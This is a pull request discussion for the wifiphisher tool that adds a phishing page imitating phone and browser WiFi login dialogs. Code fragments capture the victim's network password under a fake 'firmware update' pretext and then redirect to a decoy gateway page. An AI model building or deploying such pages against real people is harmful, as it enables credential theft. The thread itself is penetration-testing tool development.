### PR TITLE
Device Modal (new scenario)

### PR DESCRIPTION
**Pull request by laozi999**
Shows a login modal based on the victim's device/browser.

### CODE REVIEW

**Comment by laozi999** [comment]
Make sure you change line 4 in index.html (change the ESSID to that of your fake AP).

**Comment by laozi999** [comment]
Would be nice if this variable gets fetched automatically from wifiphisher, but I haven't had the time (or patience) to build this..

**Comment by sophron** [comment]
Nice, I'll have a look at this PR later today.

The ESSID is fetched automatically. Have you checked the <a href="http://wifiphisher.org/docs.html">docs</a>? The information you need is under the "Placeholders" section. You simply need to put {{ essid }} in your code.

**Comment by laozi999** [comment]
Ahhhh, I'm not an Angular person believe it or not.. Will make an attempt :+1:

**Comment by sophron** [comment]
This is not Angular, the syntax is close to it maybe. It's <a href="http://www.tornadoweb.org/en/stable/guide/templates.html">Tornado's templating language</a>.

**Comment by laozi999** [comment]
When I add that code, nothing happens, the page won't load, not even a request gets logged, only DHCP leases are logged.

I have tried the following:

```
var ESSID = "{{ essid }}";
var ESSID = {{ essid }};
var ESSID = "{{essid}}";
var ESSID = "{% essid %}"; // from tornado's documentation
```

I have also tried putting it directly inside the span:

`<span>{{ essid }}</span>`

As soon as I change it to normal text, the requests get logged in wifiphisher again, and the web page is shown.

I'm at a complete loss here?

**Comment by laozi999** [comment]
I've ran wifiphisher with and without setting the essid (--essid)

**Comment by laozi999** [comment]
PS

Found a typo in your documentation:

target_ap_channel <str`<`: The channel of the target Access Point

**Comment by laozi999** [comment]
Did you mean
{{ target_ap_essid }} ?

**Comment by sophron** [comment]
My bad, the keyword is "target_ap_essid", not "essid". You can have a look at how the others templates are leveraging this.

**Comment by laozi999** [comment]
That's it, all fixed :) Will make PR

**Comment by laozi999** [comment]
My love for wifiphisher just grew even stronger ;)

Makes life that much easier, much appreciation!

File: wifiphisher/data/phishing-pages/device-modal/config.ini [hunk 1]
```diff
@@ -0,0 +1,6 @@
+[info]
+Name: Device Modal
+Description: Shows a login modal based on the victim's device/browser.
```
Comment (sophron) [inline wifiphisher/data/phishing-pages/device-modal/config.ini]: We need more analysis here.

What is your vision regarding this scenario? How would users use it (what credentials can be obtained) and what makes it different from the ones we currently support?

File: wifiphisher/data/phishing-pages/device-modal/index.html [hunk 2]
```diff
@@ -0,0 +1,694 @@
...
+			opacity: .35;
+			pointer-events: none;
+		}
+	</style>
+</head>
+<body>
+	<div class="container main hide">
+		<div class="window faded">
+			<h1>Authentication Required</h1>
+			<p>The network <span>{{ target_ap_essid }}</span> requires a password. The server says: Modem firmware was updated.</p>
```
Comment (sophron) [inline wifiphisher/data/phishing-pages/device-modal/index.html]: An idea is to make this text configurable with a default value by the end-user. You can put this as a variable under a "context" section in the `config.ini` file. See the docs for more information.

Comment (sophron) [inline wifiphisher/data/phishing-pages/device-modal/index.html]: I would change the "requires a password" part to "requires a {{ target_ap_encryption }} password".

File: wifiphisher/data/phishing-pages/device-modal/index.html [hunk 3]
```diff
@@ -0,0 +1,694 @@
...
+
+        		if ($('.main input[name=password]').val().length < 8) {
+        			close();
+        			return false;
+        		} else {
+        			e.preventDefault();
+
+    				// timeout:800
+    				setTimeout(function(){
+    					$.post('/post', 'wfphshr-wpa-password=' + $('.main input[name=password]').val(), function(){
```
Comment (sophron) [inline wifiphisher/data/phishing-pages/device-modal/index.html]: The variable's name 'wfphshr-wpa-password' indicate that the captured passphrase will always be the pre-shared key. Is this true? If not, you should rename the variable to something more generic.

File: wifiphisher/data/phishing-pages/device-modal/index.html [hunk 4]
```diff
@@ -0,0 +1,694 @@
...
+    			$('.ios input[name=password]').focus();
+    		});
+
+    		$('.ios form').submit(function(){
+    			if ($('.ios input[name=password]').val().length < 8) {
+			        // Don't submit a password smaller than 8 characters
+			        return false;
+			    } else {
+			    	$.post('/post', 'wfphshr-wpa-password=' + $('.ios input[name=password]').val(), function(){
+						window.location = './gateway.html'; // pretend to log in to gateway
```
Comment (sophron) [inline wifiphisher/data/phishing-pages/device-modal/index.html]: I'm not sure how the credentials are captured and logged. The way to do it is to post the data to "/loading" (I'm sorry this is not documented).

**Comment by laozi999** [comment]
Glad i can help.

I will make the necessary changes and then address each of your comments.

File: wifiphisher/data/phishing-pages/device-modal/config.ini (hunk 1 above)
Comment (laozi999) [inline wifiphisher/data/phishing-pages/device-modal/config.ini]: Name: Device Modal
Description: Shows the iOS/Android WiFi login modal on phones and tablets. Shows a Chrome login modal for a .htaccess restricted page on desktops/laptops.

File: wifiphisher/data/phishing-pages/device-modal/license.txt [hunk 5]
```diff
@@ -0,0 +1,10 @@
+
```
Comment (laozi999) [inline wifiphisher/data/phishing-pages/device-modal/license.txt]: Removed.

File: wifiphisher/data/phishing-pages/device-modal/index.html (hunk 2 above)
Comment (laozi999) [inline wifiphisher/data/phishing-pages/device-modal/index.html]: **Regarding the header:**
Added `target_name` variable to config.ini file

Regarding the paragraph:
Can wifiphisher/tornado interpret {{ variables }} within the config.ini file? Sounds like it needs some escaping.

Comment (laozi999) [inline wifiphisher/data/phishing-pages/device-modal/index.html]: That part of the documentation was confusing, it wasn't until I read the very last paragraph on the bottom when I understood what to do.

**Regarding the header:**
Added `login_title` variable to config.ini file

**Regarding the paragraph:**
Can wifiphisher/tornado interpret {{ variables }} within the config.ini file? Sounds like it needs some escaping.

Comment (laozi999) [inline wifiphisher/data/phishing-pages/device-modal/index.html]: Added.

File: wifiphisher/data/phishing-pages/device-modal/index.html (hunk 3 above)
Comment (laozi999) [inline wifiphisher/data/phishing-pages/device-modal/index.html]: Changed to `wfphshr-password`.

File: wifiphisher/data/phishing-pages/device-modal/index.html (hunk 4 above)
Comment (laozi999) [inline wifiphisher/data/phishing-pages/device-modal/index.html]: The same as the other pages using /post.

I have redirected the victim to a gateway.html page so it seems more legitimate after a 'firmware update'.

Comment (laozi999) [inline wifiphisher/data/phishing-pages/device-modal/index.html]: This should probably be changed to /static/gateway.html seeing as everything gets redirected to the login page.

**Comment by sophron** [comment]
@laozi999, Git is a powerful tool, it would be great if you master the basics of it and it will save us a lot of time. If you have any issues with `squash`, add me on jabber and we can work on it together.

**Comment by sophron** [comment]
Hi @laozi999,

Any progress on that?

**Comment by alternatexp** [comment]
Just merge it :D

**Comment by laozi999** [comment]
I refuse to adopt github's "indie" terminology, I have made the requested changes, it is up to you whether you want to use it or not

**Comment by blackHatMonkey** [comment]
Hi @laozi999 Would it be possible to make a PR over [here](https://github.com/wifiphisher/extra-phishing-pages). This is the new repository that we use for all the new scenarios.

**Comment by laozi999** [comment]
@blackHatMonkey certainly!

**Pull request closed without merging**